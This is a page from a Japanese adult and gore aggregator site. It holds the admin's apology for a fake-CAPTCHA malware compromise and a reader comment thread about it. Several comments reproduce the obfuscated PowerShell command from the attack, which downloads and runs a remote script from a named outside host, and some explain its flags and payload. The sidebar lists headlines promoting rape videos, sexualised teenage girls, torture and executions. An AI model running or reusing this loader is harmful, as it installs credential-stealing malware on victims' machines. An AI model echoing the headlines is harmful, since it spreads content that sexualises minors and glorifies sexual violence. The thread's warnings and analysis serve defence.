また、相互サイト・アンテナサイトの管理者様にも多大なご迷惑をお掛けしましたこと、心よりお詫び申し上げます。
本日は記事の更新数が少なめになります。明日より通常通り記事更新を行っていきますので引き続きよろしくお願いいたします。
ポッカキット 管理人
コメント待ってます!
-
(↑)ポッカキットは開設12年目、累計90億PV、1日250万~300万PVの18禁サイトです。。。
⇒ スマホでも「ポッカキット」で検索!
■ ポッカキット・最新記事(20件)
-
【ガチ動画】ハメ撮り嫌なのに何回もイッてしまう10代少女、エロすぎる -
【閲覧注意】男「チェンジで」風俗嬢「無理です!」⇒ 結果(動画あり) -
【閲覧注意】青木ヶ原樹海の自殺女性の横にあったメモ、あまりにも闇が深すぎる(画像あり) -
【閲覧注意】ウクライナの ”毒入り差し入れ” に気づかず飲んだロシア兵4人の末路(動画あり) -
【流出】本番あり風俗の体験講習を受けた18歳の少女の動画がヤバい…これほぼレ●プだろ… -
【閲覧注意】登山者、首が50cmある人間を見つけ笑ってしまう(動画あり) -
18歳グラドル「セクシーな水着着てみたwww」⇒ 乳首見えちゃってると話題に -
【閲覧注意】ロシア軍「敵に降伏?なら死ね」⇒ 恐ろしい動画が流出する -
【レ●プ】ギャングに拉致された女性2人が意識不明のまま挿入される動画、闇が深すぎる -
【閲覧注意】レ●プ大国の女子大生「教授に性的暴行されてるけど皆無視する…そうだ!」 -
【動画】爆乳女が日本の街中でおっぱい丸出し ⇒ 男達の反応がコレwww -
【動画】ホームレス♂におっぱいを触らせ、マ○コを舐めさせるサービスの女の子ヤバすぎワロタwww -
【閲覧注意】アフリカンギャングが実行した拷問・処刑「人間噴水」、エグすぎる(動画あり) -
音楽フェスで見つけた ”100%ヤレるギャル”、ナンパ→ハメ撮りの一部始終がコチラwww -
【生ハメ】体がエロく発育しすぎた10代美少女、村の男達の慰み者となってしまう -
【閲覧注意】人妻とセ○クスしまくってたヤリチン、チ●コを切断される -
【閲覧注意】ヤンキー高校生3人、学校のトイレで女子生徒をレ●プし逮捕。現場が地獄絵図すぎる -
【閲覧注意】アメリカのいじめられっ子、実は銃を隠し持ってた結果・・(動画あり) -
【動画】ヒジャブ(布)で体を隠してるイスラム美女、裸になったらドエロい体してた… -
【閲覧注意】白人美少女肉便器、完成してしまう・・・(動画あり)
-
PHOTO(12769)
MOVIE(21861)
HUMAN(1002)
ANIMAL(1508)
GIRLS(1044)
GIRLS? (8227)
CELEBRITY (1460)
UFO&UMA (192)
SPORTS (434)
DANGER (14564)
OTHERS (6180)
PO-KAKI-TO
時給は1500円ですか?
何か操作しろとか怪しい表示されてたからスルーしてたは
無料のadwcleanerとかでチェックした方がいいかもね
今時アンチウイルスソフトなんか使ってる人は騙されそう笑
①私はロボットではありません←ここでクリップボードにコードがコピーされる
②Windowsボタンと「R」を押す
③「CTRL」と「V」を押す
④「Enter」を押す
④までやっちゃった人はちゃんと駆除しましょうね
えらくお粗末な感染仕様だな
せめて1ストップで感染するようにしないと効果少ないでしょ
おめえら、ポッカ民にしては賢いじゃないか!
ワイLinuxだけど、全部やっちゃった😋
ちなPowerShellは入ってない
説明ありがとう
3までやったけど危なかったわ
2まで素直にやっちゃって、これはヤバイと気づいた。
やっちゃった人、何が実行されたのか教えて。
まぁこれニュースで見た手口だからメモ帳にCtrl+Vして
プークスクスしました
Windowsボタンと「R」を押すを見てヤバイと察知したw
①が出た時点でデベロッパーを開いてHTMLのをすべて消去する
③までやって消した
謝罪汁!賠償汁!
詫び石はよ!
直ってよかった、よかった
誤って済む問題か?
こんなとこ見てる奴が根本的に悪いので
ンダッコラノッカッカッコッラ1000mgまでヅラ貸せやハゲとんじゃワシ
誤字を誤れ
誤免なさい
誤ってるのはおまえで草
今来たので感染せずにすんだズラ
銭ゲバか
capature導入したと思ってウチました
1000兆億円要求します
え?感染してんじゃん
ヤバw
多分ここに被害者が押し寄せてくるだろうから対応策も書いておいたほうがいいんじゃない?
パスワード抜かれてオワタ状態なのも分かってないかも
やべー。ロボットですか?みたいなのの、四角い箱の所押しちゃったわ。
え???それで即感染するの???
しません…
俺も押した。今震えてる。Linux民だけど。
どんな被害がありますか?
一生大卒だと思い込んだまま就職先を会社で探すんですよ定年まで
大卒の効力なんて、新卒の就活時だけ
30過ぎたら無効
オレもポチったー
最初ぽちっただけなら大丈夫。その後の指示通りに「ファイルを指定して実行」画面を開いてコマンドを実行するとアウト。
あのPowershellがどうのこうのってやつ?
ワイ、LinuxだからPowershellとかよくわからない
脅威がブロックされましたって出ればセーフだよね?
そのメッセージ本物ですか?
ウイルスが油断させるために出した偽メッセージかもしれませんよ
スキャンすりゃ分かることや
怖かったのでスギ薬局で体組成スキャンしてきました。体脂肪率11%でした。
やっぱハックされてたんだ、入力しそうになったわあぶね~
原因はなんだよ?せめて原因は公表しろよ。
自身のミスか?あなたも同じような指示系ウイルスで指示通りやっちゃった口か?
あれ指示通りやると普通にいろんなアカウント乗っ取られるぞ。
対応策はありません。抜かれたら最後です。相手よりも先にアカウントのパスワードやユーザー名を変えるぐらいですかね。そしてPCをクリーンインストール。と言っても相手も素早いので大概負けます。
指示通りに操作すると操作者には分からないところで別サイトからファイルをダウンロードして ファイルの拡張子をpdfからexeに変えて実行させる仕組みになってた。exeの中身は見ていないからどんな被害を受けるかはわからない。
すげーなクリップボードにコマンド勝手に入ってた
エンター押したら終わってた
ワイもロボットじゃないにチェック入れた後、
クリップボードにPowershellのコマンドが入ってた
訳わかんないから消したけど、Linuxだから影響はないと思ってる
俺のPCから児ポが流出してしまったかもしれない
どうしよう
手遅れにならないようアップロードしておくんだ
君の個人情報付きでダークウェブに晒されるだけだから安心しろ
海外旅行で入国時、スマホの中確認させられるよ
どうせ中国人の仕業だろ
つまり、武漢ウイルスに感染するわけですね
無料のサイトで何言ってんだか
「その「私はロボットではありません」は本物? マルウェア感染狙う“偽CAPTCHA”出現 米Microsoftが注意喚起」
↑この手口
なぜキャプチャ偽装でやるかっていうと、コピペのコマンドが、クリック動作なしだと拒否するブラウザの防御があるからなのよね。
実にポッカらしい話題
そりゃこうなるよ
ポッカを訴えればええんか?
私はロボットなので反応しなかった。ロボットなのでグロ見てもなんとも思いません。ロボットなので。
では、エロを見るとどうでしょう?
もちろん熱暴走しますよ
ロボットなので
一人芝居お疲れさま
まじでやばかった。普通にポチるとこだった。
押してもないのに押した判定される広告のバグとかがまだ残ってますよ
スマホで良かったわ
こんなサイト見に来るやつで実行しちゃう奴とかいるのか
怖いもの見たさで、好奇心旺盛だと思わず・・・
被害の具体的な情報が欲しい
感染したOS、何をしたらマルウェアが実行されるか等
「閲覧は自己責任w」じゃ済まないぞ!
しょっぱなPowerShellだからWindowsじゃないと感染できない
俺、Linux(ubuntu)でここ見てたんだが、
Linux向けのPowerShellインストールしてないし、大丈夫かと思ってる
実際ほとんどの閲覧者はLinux(android)じゃないかな
そういや最近増員ゲフンゲフン
謎はすべて解けた!!
犯人は・・・
(次号につづく)
犯人はじっちゃんの名にかけて!
(次号につづく)
よう復活したなぁ!
もう終わったとおもったよ!
Safariなら大丈夫だよね?
俺は横断歩道のマスか自転車、自動車の含まれたマスをチェックすることしかできんからな
何だあの複雑なコマンド
WPの脆弱性でも突かれたかね。
「ファイル名を指定して実行」にコマンドコピペしろってやつだから
脆弱性ではないよ(強いて言えばそんなことをする人間が脆弱性)
FORMAT C: とか DEL C:\ とか打たせて消えたとか言われても
それ脆弱性はじゃないでしょ
>強いて言えばそんなことをする人間が脆弱性
www
これは、不正ログインによる改竄がWPの脆弱性を突かれたのではって話だなw
ああWordPressか
(.NETじゃない方の)WindowsPowerShellのことかと思った
ttps://imgur.com/Gxh82MZ
クリップボードに勝手に入った文字列のコピー
規約違反ならイムガーから削除します
サンクス。
ファイル名見切れてる jhbbnmoihubnjmo.txt
に記載のdns.pdfをtempにcsrss.exeとして落として実行
(system32のcsrss.exe自体はシステムファイルなので削除しちゃだめ)
もちろんWindowsでしか動かない
拾ってみたけど難読化されている上に11MBと巨大なので解析はパス
クソデカいと思ったらこれランタイム込みのPythonスクリプトだな
Nuitkaって難読化コンパイラ使ってる
Vista以上かつ64bitじゃないと動かないからXPとか10の32bitとかはセーフ
覗こうと思ったけど逆コンパイラが64bitでしか動かないからやっぱりパス
やっぱりハックだったか。あの画面出た瞬間閉じてたわ
っぱ常日頃から疑ってないとな!
逆に聞きたいんだけど全部指示通りにしたやつはページ見れたの?
指示は不正ファイルのダウンロード&実行だからページを開くとかはない
犯人絶対捕まえてポッカ名物腕ゼリーだろ
iPhoneで良かったぜ!
本物のCAPTCHAやreCAPTCHAの認証プロンプトもたくさんありますが、「特定のキーの組み合わせを押してください」とか「デバイスでコマンドを実行してください」といった指示が含まれるものは、間違いなく偽物です。
令和の時代にこんなん引っかかるヤツおるんか
むしろ(脱獄でもしない限り)ユーザーに管理者権限が無い
スマホキッズだらけだから簡単に引っかかるんだよ
未知の脆弱性を突くような高度なウイルスは激減して
自分でIDやらパスやら入力させるフィッシングサイトだらけだし
余裕ぶっこいてるお前みたいなんが一番危険やぞw
最近、メールでの世界での詐欺の8割が日本向けみたいな記事を見たけど、これだけ情弱が多いとそりゃターゲットにされるわな
高校で情報授業が必修化されたけどその上の世代なんかほぼ知識に触れて無いもんな
Mac無反応で助かったわ
さんざんニュースにもなってた手法なのに引っかかるやつおるんか
アマプラやネトフリがタダになるとか言ってばら撒かれたやつと同じ手口だし
テレビ見ない! ニュース見ない! とか言ってるスマホキッズが引っ掛かる
Twitterでよく流れてくる「ここからアクセスすれば、無料で見れます」ってやつね
テレビ見てるおじいちゃん草
ネット民にとってはWindows95から常識なんだが
テレビの情報は30年遅れてるだろ
kk
あぶねー
件のClickFixの仕様上Windows環境が対象だから、情弱の多いスマホ勢は認証しようとして出来なかったとか多そう
スマホでまとめは広告ダルくてまともに見れなそう
シコろうと思ってサイト開いたら
今まで見たことない認証出たから速攻別のおかずに切り替えたわ
うわ・・あれポッカの仕様でも、googleの仕様でもないのか。全部従っちゃった。
俺普通にチェックボタン押してもうたんやけど感染確認ってどこでやるん?
その後のWin+Rでファイル名を指定して実行でコマンド入れなきゃ問題ない
つかスマホだとそもそもWinキーって時点で相手にされてないでしょ
ありがとう
LinuxだがWin+Rやっても無反応だし、ターミナルに例のPowerShellのコマンド入れても無反応だろうから、とりあえず大丈夫かなと思ってる
来月のクレジット明細で
脅かさんでよ泣
おめでとうございますん
Windowsならネット接続を切ってオフラインスキャンを必ずして下さい
全ファイルチェックには時間を要するでしょうが必要な処置です
やってもうた
クリックした人は情報抜かれたかもしれんね
最悪や カードとかも抜かれるのこれ?
最後までやってたら残念ながら抜かれた後だろう
お前らいつも抜いてんだからたまには抜かれたっていいだろ?
お口で抜かれるのは大歓迎ですが、ウイルスは気持ちよくないからヤダ
クレカ番号とか入れとくなよw
ブラウザにカード番号とか保存してたら抜かれた可能性あるんじゃね
終わりや泣
心配ならフルスキャンして確かめとけって
Lummaならスキャン回避もするからスキャンだけで安心できないんじゃね
スマホは、セーフなのかい?
スマホもmacもLinuxもセーフ
やられるのはWindowsだけ
教えてくれてありがとう
チェックしただけならセーフだから安心しろ
時給1500円の人員募集はこういう時のための人柱
説
今回は許すが家には勝手にマルちゃん正麺が来たぞ!!
案内のコマンド入力したけど何も無かったよ。
何故ならアドブロック沢山入れてるからね♡リンクページが開く事は無いのだ
釣りなのかなー?表示せずに実行する一文が含まれてたけど・・・
そもそも感染したことに気づいてないやつがどのくらいいるんだろうな
サイト開いたらこういう画像が出てて、何をした人がアウトだったかくらい書き残してやれよ
指定のキーをいくつか押したらコマンドが出て来て
指示通りもう一度キーを押したら無反応だった、アウト?
アウトです
実行に失敗すればエラーがでますが
成功した場合は感染したことがバレないように
何も無かったような振る舞いをします
感染者発見 汚物は焼却
だからアバストが反応したのか
お疲れ様でした
4までやらなきゃ基本セーフ
心配ならスキャンしとけディフェンダーでも検出できるとよ
せめてこういう画像が出てました
指示通りに入力した人はアウトですくらい教えてやれよ
多分感染に気づいてないやつ大勢いるだろ
こんなとこPCで見るなよ
気づいて入力しなかったけど、あれ引っかかった馬鹿いるんだw
まぁすぐ分かるやろ感染するような操作する情弱いい勉強になったろ
勉強になっていないと思う
新手のウイルスが登場したらまた感染するだろうし、
感染したことにも全く気づいてなく自分は大丈夫だと思っている
いつもと違う操作が出たらすぐ閉じてググれって事だ
所見の奴は知らん
ここを読んでる時点でちょっとでも心配になる奴はクイックスキャンくらいとっくにしてるだろ。それすらしないままの奴は救いようのない情弱で勉強の段階にもないアホだけや
powershell -No”P”ro”f”ile -w h -C”o”mmand “iex (iwr -Uri ‘https://s4m”ed”solu”t”ions.c”om/jh”bbnmo”ihub”njmo.txt’ -Us”e”Basi”cPa”rs”i”ng)”;
解読班頼む
問題はポッカのサイトのIDパスが漏れてた(不正ログイン)こと
どこから漏れたのか(更新に使ってるPCが感染してる等)を
突き止めて対処しないと再発するよ
チェックだけなら大丈夫。コマンドにコピペして実行したら、マルウェア仕込まれて情報抜き放題。
すぐにオフラインにして、セキュリティスキャンとマルウェア除去が必要
Windowsキー無効にしててよかったわ
ポッカキットが謝るこたぁないわ
もうクレカの情報抜かれとるかな
ちょうどネット見ようとしたらネットに繋がってなくてよかった
対応お疲れ様でした
スマホで助かったわ
そらこんなやばい動画やってりゃそういうのはあるだろうな
惰性でやってたせいでセキュリティ検査なりサーチルーツのアプデとか怠ったんやろ。
震えて眠る
おっ良かった
java切ってあったからか403しか表示されなかったけど
これからポッカ見る時は仮想化環境からにした方が安全かも
仮想環境で覗く程度の知識あるやつがこんな低レベルな仕掛けに引っかかるわけ無いだろ
仮想環境自体は難しくないが、
Win以外のOS使っている人は
マルウェアの知識がほぼ無いんじゃないか?
この手のサイトはスマホで見るに限る
ポッカが被害者って確定か?
被害者が通報して捜査対象として管理人が出頭してもいないのに分からん
ESETが「Fakeトロイが云々~」警告出してきたのでページ開かなかった
ディフェンダーじゃページ自体は開いちまうからやっぱ弱いんやな
1. powershell -NoProfile -windowstyle hidden -Command “…”
-NoProfile: PowerShellのプロファイルを読み込まずに実行(→ セキュリティ設定などを回避しやすい)
-windowstyle hidden: PowerShellウィンドウを表示せずに実行(→ ユーザーに気づかれない)
-Command: 指定されたコマンドをそのまま実行
2. iex (…)
iex = Invoke-Expression: ダウンロードした内容をコードとしてそのまま実行する非常に危険な命令。
3. iwr -Uri ‘https://s4medsolutions.com/jhbbnmoihubnjmo.txt’ -UseBasicParsing
iwr = Invoke-WebRequest: 指定URLからファイルをダウンロードする
-UseBasicParsing: 古いバージョンのPowerShell互換性オプション
この場合、https://s4medsolutions.com/jhbbnmoihubnjmo.txt というリモートファイルを取得し、その内容をPowerShellスクリプトとして実行する
Windowsウイルスと脅威の防止から
保護の履歴を確認してブロックされていれば大丈夫
それ以外は操作しちまったやつはアウト
結構大変なんやな
管理人さんは悪くありませんし、グロ民たるもの危機回避能力はありますら大丈夫ですよ
心よりお詫び申し上げるだけかよw
野生の勘で危険を察知してやらなかった
あぶねー
ぶっちゃけPCでやってたら従ってた気がするわ
ダークウェブに抜かれたものを晒されるとgoogleさんから即通知来るから安心して眠れ
チェック項目がおかしいなって思ってチェックボックスにクリックした後にコピペを確認したら思いっきり変な操作がコピーされててやばいと分かったわ
mac最強
俺はハンバーガー嫌いなので
どうでもいい
絶対に許さないよ
気にするな。想定内だ。
まあ一番やばいのは管理人自身やもしれんなw
どっかで食らってんだからw
動画再生しようとして、エロサイトに飛ばされたお前は感染してるぞ。
クリップに残ってた
これやな
powershell -No”P”ro”f”ile -w h -C”o”mmand “iex (iwr -Uri ‘https://s4m”ed”solu”t”ions.c”om/jh”bbnmo”ihub”njmo.txt’ -Us”e”Basi”cPa”rs”i”ng)”;
全部やってしもたわ。
なんか実行されてたわ。
セキュリティー入れてへんわ。
ウインドーやわ
どーせ、まーた、中国人かよ
Safariだとロボットにチェック入れた後なんもできんかったからセーフやったわ
感染した奴いるとか嘘やろ
無知すぎ
すみません
IT後進国の末路…
こんなんどの国でもあるで。後は企業がどれだけセキュリティ高いか。
むしろこのサイトを大事なPCで閲覧してる奴がいたことに驚きだわ…
そしてそんな面倒な胡散臭い手順を踏んでまでモザイク付きエロ動画を見ようとするなんてw
カメラのシャッター音(偽者)が鳴って、お前のシコり全裸画像撮ったから金払え!系詐欺の方が引っかかるやつ多そう…
ごめんなさい。おばちゃんなんで、皆の言ってる事が ちんぷんかんぷんです…
被害に遭った人らは何を見ようとしてそんな面倒くさい操作したん?
とびきりのエロ動画のキャプ画像でも載ってたん?
「なんか面倒くさっ!」と思って閉じて正解だったかw
とりあえず一発抜いてから考える
ちょうど忙しくて見てなくてよかったああああ
そのマルウェアを本当に入力した人も愚かだ。
そういや朝に見ようとしたらbot扱いにされたっけ
で、変な入力画面あってめちゃくちゃ怪しいから入力せず出入り繰り返してたが無理だったが、乗っ取られたんかw
未だ童貞なんだが、もしかしたら感染したせい?
こういうのってプロでも犯人特定できないものなの?
🔍 コマンドの内容と動作
このコマンドは、Windowsの PowerShell を使って、以下の処理を行います:
-NoP:プロファイルを読み込まずにPowerShellを起動(検出を回避)
-W Hidden:ウィンドウを非表示で実行(ユーザーにバレないように)
-Exec Bypass:実行ポリシーを無視してスクリプトを実行
iex (iwr -Uri ‘URL’):
iwr(Invoke-WebRequest)で外部のURLからコードをダウンロード
iex(Invoke-Expression)でダウンロードしたコードを即座に実行
⚠️ 危険性
このコマンドは、外部のサーバーから悪意のあるスクリプトをダウンロードし、即座に実行します。たとえば:
マルウェアのインストール
ランサムウェアの展開
個人情報の窃取
バックドアの設置 など
てかパソコンから見てる奴いんのかよ
動機は731記事でしょうか。実益も兼ねての不正アクセスでしょうか。
ここのコメ欄が一番盛り上がっていて笑える
ESETがめっちゃ怒って助かった
CAPTCHAチェックしただけだから大丈夫だと思ったけど、心配になってディフェンダーで調べたら
Trojan:HTML/FakeCaptcha.HNA!MTBが見つかったわ
今回CAPTCHAチェックしただけで問題無ければ、以前にどこかでCAPTCHAチェックした時に感染したって事なのか
113.パソコンってwww
プライベートでWinを使わない決意をした
ファイル名を指定して実行の履歴確認してなかったら大丈夫なんか?